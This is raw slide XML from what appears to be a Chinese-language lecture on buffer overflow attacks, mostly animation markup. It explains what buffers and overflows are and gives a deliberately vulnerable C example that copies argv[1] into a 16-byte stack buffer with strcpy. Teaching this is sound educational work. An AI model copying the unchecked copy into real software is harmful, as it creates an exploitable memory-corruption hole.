                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60424"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60424"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6042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0422"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60422"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60422"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60422"/>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60420"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60420"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60420"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60420"/>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60418"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60418"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60418"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60418"/>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60419"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60419"/>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60421"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60421"/>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60423"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60423"/>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60425"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60425"/>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60427"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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ldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="60419" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="60420" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="60421" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="60422" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="60423" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="60424" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="60425" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="60426" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="60427" grpId="0" bldLvl="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rPr>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12290" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A62A0558-BA1C-4269-8788-99BCA40AD57B}"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6781800" y="6324600"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C3D65E1-6F3A-4633-A60C-5385100C907D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304130" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缓冲区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>溢出及基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>概念</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>过去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>十多年最大的安全隐患，大部分网络蠕虫都是利用缓冲区溢出进行攻击、传播。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓冲区：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>程序用于保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户输入数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、临时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据的内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>局部变量，保存在（堆）栈中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>预先分配，后存取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>输入数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>超出缓冲区预设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，而程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不检查</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>超出数据覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序为其它数据分配的内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全意识，假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>长度与存储空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>相</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>匹配</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>历史遗留，压缩程序代码空间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30413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9550" y="2514773"/>
            <a:ext cx="2584450"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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="304132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="304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a:xfrm>
            <a:off x="611188" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1525763" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>main(int argc, char **argv) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>  { </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>     char buffer[16];  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>存储在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>     strcpy(buffer,argv[1]); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>  return 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714876" y="2285992"/>
            <a:ext cx="3286148" cy="1643074"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -75026"/>
              <a:gd name="adj2" fmla="val 241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en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>不匹配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>argv[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
